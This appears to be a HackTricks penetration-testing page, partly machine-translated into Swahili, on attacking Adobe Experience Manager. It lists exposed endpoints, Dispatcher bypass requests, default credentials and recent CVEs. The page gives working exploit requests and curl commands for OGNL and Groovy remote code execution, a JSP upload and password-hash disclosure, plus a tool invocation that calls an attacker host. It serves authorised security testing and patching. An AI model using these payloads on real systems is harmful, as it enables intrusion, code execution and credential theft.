HackTricks
AEM (Adobe Experience Manager) Pentesting
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) ni CMS ya shirika inayokimbia juu ya Apache Sling/Felix (OSGi) na Java Content Repository (JCR). Kutoka kwa mtazamo wa mshambulizi, instances za AEM mara nyingi huweka wazi dangerous development endpoints, weak Dispatcher rules, default credentials na long tail ya CVEs ambazo hupatchi kila robo mwaka.
Orodha ya ukaguzi hapa chini inalenga externally reachable (unauth) attack surface ambazo zinaendelea kuonekana katika real engagements (2022-2026).
1. Fingerprinting
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1 # header added by AEM Dispatcher
X-Vary: Accept-Encoding
Other quick indicators:
/etc.clientlibs/static path present (returns JS/CSS)./libs/granite/core/content/login.htmllogin page with the βAdobe Experience Managerβ banner.</script><!--/* CQ */-->comment at the bottom of HTML.
2. High-value unauthenticated endpoints
| Path | What you get | Notes |
|---|---|---|
/.json, /.1.json | JCR nodes kupitia DefaultGetServlet | Mara nyingi imezuiwa, lakini Dispatcher bypass (ona chini) inafanya kazi. |
/bin/querybuilder.json?path=/ | QueryBuilder API | Leak ya page tree, internal paths, user names. |
/system/console/status-*, /system/console/bundles | OSGi/Felix console | 403 kwa chaguo-msingi; ikiwa imefunuliwa & creds zinapatikana β bundle-upload RCE. |
/crx/packmgr/index.jsp | Package Manager | Inaruhusu authenticated content packages β JSP payload upload. |
/etc/groovyconsole/** | AEM Groovy Console | Ikiwa imefunuliwa β arbitrary Groovy / Java execution. |
/libs/cq/AuditlogSearchServlet.json | Audit logs | Afisho la taarifa. |
/libs/cq/ui/content/dumplibs.html | ClientLibs dump | XSS vector. |
/adminui/debug | AEM Forms on JEE Struts dev-mode OGNL evaluator | Kwenye installs za Forms zilizosakinishwa vibaya (CVE-2025-54253) endpoint hii inatekeleza OGNL bila kuidhinishwa β RCE. |
Dispatcher bypass tricks (still working in 2025/2026)
Most production sites sit behind the Dispatcher (reverse-proxy). Filter rules are frequently bypassed by abusing encoded characters or allowed static extensions.
Classic semicolon + allowed extension
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
Encoded slash bypass (2025 KB ka-27832)
GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1
Ikiwa Dispatcher inaruhusu encoded slashes, hili linarudisha JSON hata wakati /bin inakadiriwa kutukanwa.
3. Mipangilio isiyofaa ya kawaida (bado yapo 2026)
- Anonymous POST servlet β
POST /.jsonwith:operation=importinaruhusu kuweka node mpya za JCR. Kuzuia*.jsonPOST kwenye Dispatcher kunarekebisha. - World-readable user profiles β ACL ya default inampa
jcr:readkwenye/home/users/**/profile/*kila mtu. - Default credentials β
admin:admin,author:author,replication:replication. - WCMDebugFilter enabled β reflected XSS via
?debug=layout(CVE-2016-7882, bado inapatikana kwenye installs za legacy 6.4). - Groovy Console exposed β remote code execution kwa kutuma script ya Groovy:
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
- Dispatcher encoded-slash gap β
/bin/querybuilder.jsonand/etc/truststore.jsonzinafikika kwa%2f/%3Bhata wakati zimezuiwa na path filters. - AEM Forms Struts devMode left enabled β
/adminui/debug?expression=hutathmini OGNL bila uthibitisho (CVE-2025-54253) na kusababisha RCE bila uthibitisho; pamoja na XXE katika uwasilishaji wa Forms (CVE-2025-54254) kuruhusu kusoma faili.
4. Mapungufu ya hivi karibuni (mzunguko wa service-pack)
| Quarter | CVE / Bulletin | Affected | Impact |
|---|---|---|---|
| Dec 2025 | APSB25-115, CVE-2025-64537/64539 | 6.5.24 & earlier, Cloud 2025.12 | Multiple critical/stored XSS β utekelezaji wa msimbo kupitia author UI. |
| Sep 2025 | APSB25-90 | 6.5.23 & earlier | Mlolongo wa bypass wa sifa za usalama (Dispatcher auth checker) β sasisha hadi 6.5.24/Cloud 2025.12. |
| Aug 2025 | CVE-2025-54253 / 54254 (AEM Forms JEE) | Forms 6.5.23.0 and earlier | DevMode OGNL RCE + XXE kusoma faili, bila uthibitisho. |
| Jun 2025 | APSB25-48 | 6.5.23 & earlier | Stored XSS na escalation ya haki katika viambatisho vya Communities. |
| Dec 2024 | APSB24-69 (rev. Mar 2025 adds CVE-2024-53962β¦74) | 6.5.22 & earlier | DOM/Stored XSS, utekelezaji wa msimbo kwa hiari (mamlaka ndogo). |
| Dec 2023 | APSB23-72 | β€ 6.5.18 | DOM-based XSS kupitia URL iliyotengenezwa kwa makusudi. |
Kila wakati angalia bulletin ya APSB inayofanana na service-pack ya mteja na shinikiza kwa toleo la karibuni 6.5.24 (Nov 26, 2025) au Cloud Service 2025.12. AEM Forms kwenye JEE inahitaji add-on hotfix maalum 6.5.0-0108+.
5. Exploitation snippets
5.1 RCE via dispatcher bypass + JSP upload
If anonymous write is possible:
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded
:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
Sasa omba /content/evil.jsp β JSP inaendesha kwa mtumiaji wa mchakato wa AEM.
5.2 SSRF to RCE (ya kihistoria < 6.3)
/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console
aem_ssrf2rce.py kutoka kwa aem-hacker inafanya otomatiki mnyororo mzima.
5.3 OGNL RCE on AEM Forms JEE (CVE-2025-54253)
# Unauth devMode OGNL to run whoami
curl -k "https://target:8443/adminui/debug?expression=%23cmd%3D%27whoami%27,%23p=new%20java.lang.ProcessBuilder(%23cmd).start(),%23out=new%20java.io.InputStreamReader(%23p.getInputStream()),%23br=new%20java.io.BufferedReader(%23out),%23br.readLine()"
Ikiwa ni dhaifu, mwili wa HTTP una matokeo ya amri.
5.4 QueryBuilder ufichuzi wa hash (encoded slash bypass)
GET /%2fbin%2fquerybuilder.json?path=/home&type=rep:User&p.hits=full&p.nodedepth=2&p.offset=0 HTTP/1.1
Inarudisha node za watumiaji zikiwemo rep:password hashes wakati anonymous read ACLs zikiwa kwa default.
6. Zana
- aem-hacker β script ya kuorodhesha ya aina ya Swiss-army; inaunga mkono dispatcher bypass, SSRF detection, default-creds checks na mengine.
python3 aem_hacker.py -u https://target --host attacker-ip
- Tenable WAS plugin 115065 β Inagundua QueryBuilder hash disclosure & encoded-slash bypass moja kwa moja (published Dec 2025).
- Content brute-force β omba kwa mfululizo
/_jcr_content.(json|html)ili kugundua vipengele vilivyo fichwa. - osgi-infect β pakia malicious OSGi bundle kupitia
/system/console/bundlesikiwa creds zinapatikana.
Marejeleo
- Adobe Security Bulletin APSB25-115 β Security updates for Adobe Experience Manager (Dec 9, 2025)
- BleepingComputer β Adobe issues emergency fixes for AEM Forms zero-days (Aug 5, 2025)
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
Jifunze na fanya mazoezi ya GCP Hacking:Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.